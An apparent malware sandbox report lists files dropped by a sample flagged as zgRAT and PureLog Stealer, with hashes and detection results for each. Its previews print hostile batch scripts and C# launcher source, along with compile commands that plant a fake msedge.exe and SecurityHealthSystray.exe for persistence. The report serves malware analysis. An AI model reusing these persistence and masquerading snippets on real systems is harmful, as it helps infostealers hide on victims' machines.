Download File

Process:	C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	233
Entropy (8bit):	5.199865142863941
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DE1CHhJ23S8uoIKOZG1CHhJ23fYH:HTg9uYDEzdPi
MD5:	9ED880414CA0385A1522A2032540E98D
SHA1:	4678D1AC9D776BE6E088D68006CDEE8A7C93FB84
SHA-256:	5567BBCB574982E2D0D1E28380F86682F1DF3C8E593F503D2DA384AED6F1FC56
SHA-512:	9DE2758F2665C7D8BB287601B687455CE9CCBBB353C2DFA53D94DB9197FB4F23422AF7698BCAA946257003DF80E9D2E638DFD05E5BD2623849F5BF4CE1852CB4
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\4evtisdSvL.bat"

C:\Users\user\AppData\Local\Temp\5CZTOTC2vN.bat

Download File

Process:	C:\Edge\msedge.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	147
Entropy (8bit):	5.14108282680754
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9mF5XIvBktKcKZG1CHyg4E2J5xAI2WrG:hCRLuVFOOr+DE74vKOZG1CHhJ23f4
MD5:	9A7996F700BDEC8714C4702C18307EEC
SHA1:	A8E3B460DF5620B4F630BCE0197E30575116E0D6
SHA-256:	FF44DB60FCF3C748F65B20FFEBE1E8A13B6466D66B17FC32FE7B8188A20B2AA8
SHA-512:	52D776B1A9528F3BCA4FAB02B16CC5A8EFD2D1855A86A7EADAC146903E6372D92E439CAC14EAA529A07B3945691398A1D3131C044AF94245C4A1BFD8A46E64C9
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Edge\msedge.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\5CZTOTC2vN.bat"

C:\Users\user\AppData\Local\Temp\8thpWvoPcL

Download File

Process:	C:\Edge\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.163856189774724
Encrypted:	false
SSDEEP:	3:W7NcuVxAVC:WSuEo
MD5:	08AFFDE2A9C49FFDB0996DC0CA45238D
SHA1:	BAE8049EF76769658EFFA55D80C8AFDF3AB6B61A
SHA-256:	64F9D4E2D818D94E7EAA9E5D555876546E764EE95B94E70957BFB5275DD5AA36
SHA-512:	133DB6E70154D7C8C56C1A5F03A8A6C182DA54F3888647979CBE0F18CCDAD7C7FBBEC619D5C0995C56747D4BFC7E49FF2D7DE61FF052108C51FEC6E9D7C967FB
Malicious:	false
Preview:	VSfCWamHh9KKgbT51SNf1NnMg

C:\Users\user\AppData\Local\Temp\Eug1SteXDN

Download File

Process:	C:\Edge\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.483856189774723
Encrypted:	false
SSDEEP:	3:NeekGMv:0lv
MD5:	023CC520F2B188F45AC1671A86408170
SHA1:	333086076CF2DC352BD39B3DCFC5054EDEFA8E10
SHA-256:	61FEFF7E6D480AAF145EC0AA03918FE9F87AD5B6EA1DB07A27B9EF6C3E5B0481
SHA-512:	3E4E5A7A00086D90A198BA5021E3A4B1943006C09CBF2C9206625C5424EB43FC6DB0607C3DB37AE1A5620F1BD3CB51C360C99CAB6020DB9307FCEB5717F0D7F5
Malicious:	false
Preview:	2KWXYd8oxrOHwnuiA9PcuY1ta

C:\Users\user\AppData\Local\Temp\RES3594.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6c0, 10 symbols, created Mon Sep 30 18:22:18 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1912
Entropy (8bit):	4.598970566516155
Encrypted:	false
SSDEEP:	24:HH69taLzXzC9HMzwK80NSlmxT0uZhNB+h9PNnqpdt4+lEbNFjMyi0+ucN:MaLzXzC9fK80slmuulB+hnqXSfbNtmhr
MD5:	B6FEE23B7D7517238A6B96F75B4BE0ED
SHA1:	581761C2FEE38CD07C7D551751947A41F7BAC8EB
SHA-256:	41408180148B14E8D90F15825438A902B048E070BC9AAC1832F7CB4E4F0DCE79
SHA-512:	F1D930632B3569FA0E80075E9664C947419D7977D063FA9167634971FD5E4BC7FC2D3BC00794A611745A96A20FD32394EDFDA8CA350F43D4EAE2F5C9EE91D135
Malicious:	false
Preview:	L...Z..f.............debug$S........H...................@..B.rsrc$01................t...........@..@.rsrc$02........8...................@..@........Z....c:\Program Files (x86)\Microsoft\Edge\Application\CSCF5F43EE1A3D5479687C855494E4EF77.TMP.....................q.QK.......N..........5.......C:\Users\user\AppData\Local\Temp\RES3594.tmp.-.<....................a..Microsoft (R) CVTRES.O.=..cwd.C:\Edge.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................D...............................................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.

C:\Users\user\AppData\Local\Temp\RES37B7.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x6d8, 10 symbols, created Mon Sep 30 18:22:18 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1936
Entropy (8bit):	4.552220283217173
Encrypted:	false
SSDEEP:	24:Hva9wnOOgDHgwK80NaluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+OUZ:3f+vK80EluOulajfqXSfbNtmhJZ
MD5:	56360597F1A29CC598E8CF882ADFC210
SHA1:	BD384631A7D71796507335AE2A6B3E1B2DAEFCAA
SHA-256:	30B19FF8A0BE5D01D12DDD7FA136BB5F192FB36F49FEFE094C5FC89D6718AB2A
SHA-512:	078C28BA5659A7883F81798E624C6DAEA806A09F91B0122B8AC2B8C8A808AA1E936B3D8C5145A078301BA94D31F95D30F6747B4633480C9817AA160A9403D958
Malicious:	false
Preview:	L...Z..f.............debug$S........(...................@..B.rsrc$01................T...........@..@.rsrc$02........p...h...............@..@........;....c:\Windows\System32\CSC97DCA7013344A2AA8495395955A7A7.TMP...................r.av..t.y..............5.......C:\Users\user\AppData\Local\Temp\RES37B7.tmp.-.<....................a..Microsoft (R) CVTRES.O.=..cwd.C:\Edge.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................\|...............................................\|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.

C:\Users\user\AppData\Local\Temp\UXTBtIlW06

Download File

Process:	C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.293660689688185
Encrypted:	false
SSDEEP:	3:iK1qUZpNV78n:iK1q8pI
MD5:	76EEC88C194FE1A7E37B13698C6BA917
SHA1:	D210C7AA80BF427050B8F849AF137FA52B3B2DB2
SHA-256:	D6A1B5DD46B74E633129C5F083C0AD51A84814C517188A8AEF9D45640F869A93
SHA-512:	C07CDD327CAF3283D5253E2130F09FB9FEEF8964EFDA8F5231DA002109108F71B24B5D35CFADDEED142FFBA099D3451D51ADCA922CEFD10CFF2743137FFFF146
Malicious:	false
Preview:	XRmgIJNKI1B7CeqgIdLhp1Gkv

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k4xk0wxo.xzu.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ll3ydrxr.ssr.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q5kjssku.anq.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ruefcpnw.bb3.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tkzkkpix.mac.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wtketrfn.h3m.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xjp2elz3.n0n.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zdf0dot2.ifh.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\c1gtejqg\c1gtejqg.0.cs

Download File

Process:	C:\Edge\msedge.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	403
Entropy (8bit):	5.062953550447485
Encrypted:	false
SSDEEP:	12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLyd3iFkD:JNVQIbSfhV7TiFkMSfh+kFkD
MD5:	863A0E4E259672B8C347B1BE96CE417A
SHA1:	CF401444D4AEE024EBB5281FD9E89DE9A6C7D9B9
SHA-256:	35DAF4E2843293135579B64A8E18CD0FC1DBDAC3FB360D80B3B70D4793E3AA41
SHA-512:	F37B1291BAF44D7C54CEB86D12F62650A49AFAEAFADE66411ED011099E03AB5549F320E281869B528DA3814EE80C98EC09A6B65E0CCF2A397518945ACB502009
Malicious:	false
Preview:	.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe"); } catch { } }).Start();. }.}.

C:\Users\user\AppData\Local\Temp\c1gtejqg\c1gtejqg.cmdline

Download File

Process:	C:\Edge\msedge.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	251
Entropy (8bit):	5.088902214632674
Encrypted:	false
SSDEEP:	6:Hu+H2L//1xRT0T79BzxsjGZxWE8oCHhJ23fPC4dDSqj:Hu7L//TRq79cQDRz
MD5:	8A47BBE025DA67B051E26E068AC78C42
SHA1:	C664A1D742E8FFC127CAA9A8F5C20028C4D92209
SHA-256:	9E1C2BBA2B1BBD3D492395E73E841872ACE67A4E2FB5FAE80C1F4AA8DF05CDF1
SHA-512:	FBBAE0043BC76FD3755F3695FBCAA1FAC0B9BBFB7D5B930D01DD7E8072709BA097A5F79739A04335247C4179F81FF826453A3F183501205EB7DD9D33A56E42D2
Malicious:	false
Preview:	./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\c1gtejqg\c1gtejqg.0.cs"

C:\Users\user\AppData\Local\Temp\c1gtejqg\c1gtejqg.out

Download File

Process:	C:\Edge\msedge.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (315), with CRLF, CR line terminators
Category:	modified
Size (bytes):	736
Entropy (8bit):	5.271527824478237
Encrypted:	false
SSDEEP:	12:apI/u7L//TRq79cQDRSKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:apI/un/Vq79tDUKax5DqBVKVrdFAMBJj
MD5:	AFED471502819823F627210F9E3C2F61
SHA1:	F487300AFD744E554E3B008B681F5346643591A0
SHA-256:	CFC77F37D42A60943A2B7928E25F5BA317509E021C49D1011924B063826C48D2
SHA-512:	E0F61C8E3B0CE00BB583B4DA3B0570F84C1D6D39A9304ADD13FC23712B1228D09433AA165FB5CD483F5F941A13E7DAE7B2815F647CB32A7B38967CE9F7356C61
Malicious:	false
Preview:	.C:\Edge> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\c1gtejqg\c1gtejqg.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\qFKlxXtZuP.bat

Download File

Process:	C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	233
Entropy (8bit):	5.231458084830135
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DE1CHhJ23S8uoIKOZG1CHhJ23f4Eh:HTg9uYDEzdP3
MD5:	FAD0A5AA088779BB3FAA7A182F2D4E24
SHA1:	0FEB64C701B463262B40DAC813890B4E327A8C8A
SHA-256:	334EB844C9CD50B5C0BFC1D4FA2A36E276FA8059BE47081B72F8EE43C453ACC0
SHA-512:	35E920848AB2C5D2DDAFBA099B56D93842805D78FC15E14471189358AEBA37598EAF9D88DA570CEF0DB06B30525D447CE3182AB0E79FF1AD92D32C619F659FFC
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\qFKlxXtZuP.bat"

C:\Users\user\AppData\Local\Temp\srvpqulv\srvpqulv.0.cs

Download File

Process:	C:\Edge\msedge.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text
Category:	dropped
Size (bytes):	418
Entropy (8bit):	5.097044396370329
Encrypted:	false
SSDEEP:	12:V/DNVgtDIbSf+eBL6LzIfiFkMSf+eBLyd3iFkD:JNVQIbSfhWLzIiFkMSfh+kFkD
MD5:	33AC1F5F23562A665713E3860D9CAD15
SHA1:	2EBA853B8F2220982E047EF2FF6B0F7780E4E8FB
SHA-256:	0BB287A30179636637E11CE75F4D2A664D7FA8DDB7C9325CAAAD0D042F544AF7
SHA-512:	1172BDF3FC42E5980A8F0D54EDE5AEE14E9DFB29A2178C2B4882F78D7382BEA05600DF5E871CDAF68651AA49027BDF7A6C78BAEC69CD33037A8EF59BE763663D
Malicious:	false
Preview:	.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe"); } catch { } }).Start();. }.}.

C:\Users\user\AppData\Local\Temp\srvpqulv\srvpqulv.cmdline

Download File

Process:	C:\Edge\msedge.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	5.124117635692048
Encrypted:	false
SSDEEP:	6:Hu+H2L//1xRf5oeTckKBzxsjGZxWE8oCHhJ23f2zIzP:Hu7L//TRRzscQDOzIzP
MD5:	0A37440EE93088935BA379626DFC2018
SHA1:	6C3A20D616FCF50AEC56AEE0D0018CC50AAE7F0B
SHA-256:	F84A178352ED11B601678A4BDECFF3793CB8F6EE27364703F681F8989773D4FC
SHA-512:	4E2F9C873D9DD22D33F0B2C0BAED63D4F0C75F9560C31C46B2E44D79EBBCA30B31D0EF6FF0A1CAC0C95D85D0F26687C4FA69F803F8A166F1B9EF31D5F1DD85F5
Malicious:	true
Preview:	./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\srvpqulv\srvpqulv.0.cs"

C:\Users\user\AppData\Local\Temp\srvpqulv\srvpqulv.out

Download File

Process:	C:\Edge\msedge.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (330), with CRLF, CR line terminators
Category:	modified
Size (bytes):	751
Entropy (8bit):	5.248692046841666
Encrypted:	false
SSDEEP:	12:apI/u7L//TRRzscQDOzIz2KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:apI/un/VRzstDO8aKax5DqBVKVrdFAMb
MD5:	9B82ADFF87EA91A87668053913FAAAF1
SHA1:	803AB5D1F8B1D347CF38A75B8084E621418344E6
SHA-256:	AE57C0D134A86D0E300A89240AE28197B3B838FA3E969A8CAAB4AA344101942C
SHA-512:	A5CCC34823ACDF49C4C76446054599A9DE5B458BCF8A3DBCE88BA69D27DA06F7D083D8A741B3D950180156BC7C73FAD1E3C8142CFD190432D508D72141C2C4D5
Malicious:	false
Preview:	.C:\Edge> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\srvpqulv\srvpqulv.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\uXppBFsk9N

Download File

Process:	C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.263465189601646
Encrypted:	false
SSDEEP:	3:WXcByLzN4jT:WEyLOH
MD5:	A376ADAA36B6B6FA0617A8D71C0C8318
SHA1:	D0322D047202B19C16D63F930F8A764A767E1E7C
SHA-256:	3DB88BF07DCAB0548594FBAF9D48BD6EC3CC9E7A4A6CF8D2709F7494BB2C4235
SHA-512:	6E9528D049EF7B7566368FAD6F55B91C6B8D470894FFB112594F888316583A42D530508FE0F92EB4EC232F9DF97021D1922919FD53F9DBFE2C6AB1DEFC1F2F4C
Malicious:	false
Preview:	irryZAEUfpr62VhNI9tSLXffj

C:\Users\user\AppData\Local\Temp\zugvBzMsRZ.bat

Download File

Process:	C:\Edge\msedge.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	195
Entropy (8bit):	5.1238032051570235
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DE74vKOZG1CHhJ23f9be:HTg9uYDEVFbe
MD5:	C4F8ECE9810B475694C5C1F2AD666977
SHA1:	0A49A01E4A3A9D5D5ABC94E53C3CADA158BB3F98
SHA-256:	259E174700E10C5F69E48ECC7437820980BC53EE40FE2CF1B46DE53C212FEC81
SHA-512:	EDC4DBB0E21AA268FB4FC92D021CBA4B1127296791022D58940156574AC58A44752608C6120A9D979EDC41EBF5938A4974564FF3AF87E0FC58C11BA6405A80D4
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Edge\msedge.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\zugvBzMsRZ.bat"

C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1963008
Entropy (8bit):	7.552676792704024
Encrypted:	false
SSDEEP:	24576:vCkLO8zb1Pp8jwaA/KdMg8NxAQv18Ys2sYjb1/k6cMhafck0UneKYXhZa2:zLLvax4Gmhscse1
MD5:	ABD343DF6FBD7334D617F76F6F050E3C
SHA1:	864A1DA1AF2E7B5049B8E7A93402D2BDED518681
SHA-256:	1B8125938BF1872C9589546DDF4DD17E765A351046AB7F2639540C77E38546BC
SHA-512:	56665FD2191C2A4FB1B6F624A49203AFBB1075F510C1420F51AB7AED82259192336C056E54DA63421467AC3822DB980EEC94CED7E962107E0F04ACCED7201660
Malicious:	true
Yara Hits:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 74%
Joe Sandbox View:	Filename: UY9hUZn4CQ.exe, Detection: malicious, Browse Filename: gh3zRWl4or.exe, Detection: malicious, Browse Filename: seoI30IZZr.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...w..f................................. ... ....@.. .......................`............@.................................`...K.... .. ....................@....................................................... ............... ..H............text........ ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B........................H.......`...............T...u)...........................................0..........(.... ........8........E....N.......)......8I...(.... ....~....{....:....& ....8....(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8y......0.......... ........8........E............S...............8)...~....:.... ....~....{....:....& ....8.......... ....~....{....:....& ....8....~....(B... .... .... ....s....~....(F....... ....8Z...8.... ........8C...r...ps....z*....~....

C:\Users\user\Desktop\DqsZwsEl.log

Download File

Process:	C:\Edge\msedge.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
